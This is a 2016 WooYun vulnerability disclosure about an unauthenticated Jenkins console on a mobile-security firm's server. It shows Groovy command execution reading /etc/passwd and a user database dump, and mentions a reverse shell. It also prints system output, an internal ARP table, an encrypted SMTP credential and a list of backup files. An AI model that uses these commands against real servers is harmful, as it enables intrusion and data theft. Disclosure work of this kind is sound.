当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0181030

漏洞标题:网蛙科技之网蛙神探某系统未授权访问导致远程命令执行和Getshell\涉及用户数据

相关厂商:openscanner.cc

漏洞作者: Weiy、

提交时间:2016-03-07 19:16

修复时间:2016-04-22 09:29

公开时间:2016-04-22 09:29

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-07: 细节已通知厂商并且等待厂商处理中
2016-03-08: 厂商已经确认,细节仅向厂商公开
2016-03-18: 细节向核心白帽子及相关领域专家公开
2016-03-28: 细节向普通白帽子公开
2016-04-07: 细节向实习白帽子公开
2016-04-22: 细节向公众公开

简要描述:

网蛙是一家专注于移动安全的互联网企业,主要面向全球IOS、安卓App开发者提供在线漏洞扫描、恶意代码扫描和安全防护云服务,为全球数十亿移动手机用户提供隐私保护、金融支付安全防护、病毒查杀等服务。网蛙研究团队有来自美国卡耐基梅隆大学、印第安纳大学、亚马逊公司和谷歌公司的信息安全研究人员,也有来自中国本土的顶尖程序员和移动安全高手;在互联网安全尤其是移动安全领域有累积超过30年的行业经验,先后发现IOS、安卓系统多个核弹级漏洞,曾获得过全球隐私增强技术论坛最佳研究奖、美国国家安全创新奖、美国信息安全最佳研究团队等多项大奖和殊荣。
网蛙团队充满极客文化和骇客基因。在这里,程序员可以接触并学习到最前沿的安全技术;工程师可以培养出极致的代码水平和coding文化。公司注重员工的解决问题能力和学习能力,任何品行良好、编程能力出色的程序员,只要能创造性的解决问题,不惟学历和资历都可以迅速调整到关键岗位从事核心技术的研究或带领团队。

详细说明:

网蛙科技 https://openscanner.cc/index

1.png


https://121.201.28.146/ jenkins 未授权访问、

2.png


一些Git代码泄漏

3.png


smtp.exmail.qq.com
[email protected]
[email protected]
就是这个不知道怎么解密、在网上搜索了一番无^^果、说是不可逆、

<input name="_.smtpAuthPasswordSecret" class="setting-input " value="/IaFQH/5XtjiSKChPCtY3dTt8AiwLyCyFIOqL98VW+k=" type="password">


4.png


执行命令、
println "cat /etc/passwd".execute().text

Result
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin


5.png


下面反弹shell、

QQ截图20160304214501.png


# hostname loopback address
127.0.1.1	i-mfrhyzkd apk.file2.openscanner.cc apk-private.file2.openscanner.cc tieba-private.file2.openscanner.cc tieba.file2.openscanner.cc file2.openscanner.cc
sh-4.2$ whoami


6.png


内网的大量主机

arp -a
? (172.17.0.67) at 02:42:ac:11:00:43 [ether] on docker0
? (172.17.0.32) at 02:42:ac:11:00:20 [ether] on docker0
? (172.17.0.129) at 02:42:ac:11:00:81 [ether] on docker0
? (172.17.0.88) at 02:42:ac:11:00:58 [ether] on docker0
? (172.17.0.5) at 02:42:ac:11:00:05 [ether] on docker0
? (172.17.0.127) at 02:42:ac:11:00:7f [ether] on docker0
? (172.17.0.40) at 02:42:ac:11:00:28 [ether] on docker0
? (172.17.0.151) at 02:42:ac:11:00:97 [ether] on docker0
? (172.17.0.2) at 02:42:ac:11:00:02 [ether] on docker0
? (172.17.0.116) at 02:42:ac:11:00:74 [ether] on docker0
? (172.17.0.110) at 02:42:ac:11:00:6e [ether] on docker0
? (172.17.0.33) at 02:42:ac:11:00:21 [ether] on docker0
? (172.17.0.134) at 02:42:ac:11:00:86 [ether] on docker0
? (172.17.0.27) at 02:42:ac:11:00:1b [ether] on docker0
? (172.17.0.13) at 02:42:ac:11:00:0d [ether] on docker0
? (172.17.0.89) at 02:42:ac:11:00:59 [ether] on docker0
? (172.17.0.16) at 02:42:ac:11:00:10 [ether] on docker0
? (172.17.0.10) at 02:42:ac:11:00:0a [ether] on docker0
? (172.17.0.124) at 02:42:ac:11:00:7c [ether] on docker0
? (172.17.0.86) at 02:42:ac:11:00:56 [ether] on docker0
? (172.17.0.72) at 02:42:ac:11:00:48 [ether] on docker0
? (172.17.0.148) at 02:42:ac:11:00:94 [ether] on docker0
? (172.17.0.41) at 02:42:ac:11:00:29 [ether] on docker0
? (172.17.0.117) at 02:42:ac:11:00:75 [ether] on docker0
? (172.17.0.111) at 02:42:ac:11:00:6f [ether] on docker0
? (172.17.0.24) at 02:42:ac:11:00:18 [ether] on docker0
? (172.17.0.135) at 02:42:ac:11:00:87 [ether] on docker0
? (172.17.0.114) at 02:42:ac:11:00:72 [ether] on docker0
? (172.17.0.11) at 02:42:ac:11:00:0b [ether] on docker0
? (172.17.0.125) at 02:42:ac:11:00:7d [ether] on docker0
? (172.17.0.87) at 02:42:ac:11:00:57 [ether] on docker0
gateway (192.168.6.1) at 52:54:40:58:f5:79 [ether] on eth0
? (172.17.0.46) at 02:42:ac:11:00:2e [ether] on docker0
? (172.17.0.143) at 02:42:ac:11:00:8f [ether] on docker0
? (172.17.0.122) at 02:42:ac:11:00:7a [ether] on docker0
? (172.17.0.39) at 02:42:ac:11:00:27 [ether] on docker0
? (172.17.0.25) at 02:42:ac:11:00:19 [ether] on docker0
? (172.17.0.101) at 02:42:ac:11:00:65 [ether] on docker0
? (172.17.0.157) at 02:42:ac:11:00:9d [ether] on docker0
? (172.17.0.8) at 02:42:ac:11:00:08 [ether] on docker0
? (172.17.0.98) at 02:42:ac:11:00:62 [ether] on docker0
? (172.17.0.53) at 02:42:ac:11:00:35 [ether] on docker0
? (172.17.0.47) at 02:42:ac:11:00:2f [ether] on docker0
? (172.17.0.1) at 02:42:ac:11:00:01 [ether] on docker0
? (172.17.0.123) at 02:42:ac:11:00:7b [ether] on docker0
? (172.17.0.36) at 02:42:ac:11:00:24 [ether] on docker0
? (172.17.0.30) at 02:42:ac:11:00:1e [ether] on docker0
? (172.17.0.112) at 02:42:ac:11:00:70 [ether] on docker0
? (172.17.0.130) at 02:42:ac:11:00:82 [ether] on docker0
? (172.17.0.23) at 02:42:ac:11:00:17 [ether] on docker0
? (172.17.0.9) at 02:42:ac:11:00:09 [ether] on docker0
? (172.17.0.44) at 02:42:ac:11:00:2c [ether] on docker0
? (172.17.0.6) at 02:42:ac:11:00:06 [ether] on docker0
? (172.17.0.51) at 02:42:ac:11:00:33 [ether] on docker0
? (172.17.0.37) at 02:42:ac:11:00:25 [ether] on docker0
? (172.17.0.31) at 02:42:ac:11:00:1f [ether] on docker0
? (172.17.0.113) at 02:42:ac:11:00:71 [ether] on docker0
? (172.17.0.107) at 02:42:ac:11:00:6b [ether] on docker0
? (172.17.0.34) at 02:42:ac:11:00:22 [ether] on docker0
? (172.17.0.131) at 02:42:ac:11:00:83 [ether] on docker0
? (172.17.0.14) at 02:42:ac:11:00:0e [ether] on docker0
? (172.17.0.96) at 02:42:ac:11:00:60 [ether] on docker0
? (172.17.0.90) at <incomplete> on docker0
? (172.17.0.45) at 02:42:ac:11:00:2d [ether] on docker0
? (172.17.0.7) at 02:42:ac:11:00:07 [ether] on docker0
? (172.17.0.121) at 02:42:ac:11:00:79 [ether] on docker0
? (172.17.0.83) at 02:42:ac:11:00:53 [ether] on docker0
? (172.17.0.69) at 02:42:ac:11:00:45 [ether] on docker0
? (172.17.0.42) at 02:42:ac:11:00:2a [ether] on docker0
? (172.17.0.145) at 02:42:ac:11:00:91 [ether] on docker0
? (172.17.0.118) at 02:42:ac:11:00:76 [ether] on docker0
? (172.17.0.104) at 02:42:ac:11:00:68 [ether] on docker0
? (172.17.0.35) at 02:42:ac:11:00:23 [ether] on docker0
? (172.17.0.128) at 02:42:ac:11:00:80 [ether] on docker0
? (172.17.0.15) at 02:42:ac:11:00:0f [ether] on docker0
? (172.17.0.91) at 02:42:ac:11:00:5b [ether] on docker0
? (172.17.0.77) at 02:42:ac:11:00:4d [ether] on docker0
? (172.17.0.18) at 02:42:ac:11:00:12 [ether] on docker0
? (172.17.0.4) at 02:42:ac:11:00:04 [ether] on docker0
? (172.17.0.126) at 02:42:ac:11:00:7e [ether] on docker0
? (172.17.0.80) at 02:42:ac:11:00:50 [ether] on docker0
? (172.17.0.74) at 02:42:ac:11:00:4a [ether] on docker0
? (172.17.0.49) at 02:42:ac:11:00:31 [ether] on docker0
? (172.17.0.43) at 02:42:ac:11:00:2b [ether] on docker0
? (172.17.0.29) at 02:42:ac:11:00:1d [ether] on docker0


7.png


<defaultSuffix>@openscanner.cn</defaultSuffix>
  <hudsonUrl>http://192.168.6.2:8080/</hudsonUrl>
  <smtpAuthUsername>[email protected]</smtpAuthUsername>
  <smtpAuthPassword>/IaFQH/5XtjiSKChPCtY3dTt8AiwLyCyFIOqL98VW+k=</smtpAuthPassword>
  <replyToAddress>[email protected]</replyToAddress>
  <smtpHost>smtp.exmail.qq.com</smtpHost>


8.png


数据库备份文件泄漏

drwxr-xr-x  9 root  root  4.0K Jan 18 17:07 apache-tomcat-8.0.30
-rw-r--r--  1 root  root  7.0K Feb 19 16:22 openscannerbak.sql
-rw-r--r--  1 root  root  1.2M Feb 19 16:22 openscannerstore.sql
-rw-r--r--  1 root  root   57M Feb 19 16:10 tomcat-default.tar
drwxr-xr-x 10 jetty jetty 4.0K Aug 28  2015 tomcat-manager
-rw-r--r--  1 root  root  432K Feb 19 16:22 uc.sql


9.png


查看一些数据信息
println "cat /opt/apps/uc.sql".execute().text

QQ截图20160304232031.png


Table structure for table `person`
泄漏了用户的数据

10.png


11.png


漏洞证明:

都在上面了、

修复方案:

只求一VIP用户、谢谢!

版权声明:转载请注明来源 Weiy、@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-03-08 09:29

厂商回复:

1. 错误配置,导致内部服务器泄露到公网。
2. jekins 没有恰当配置用户权限,导致直接登录。

最新状态:

暂无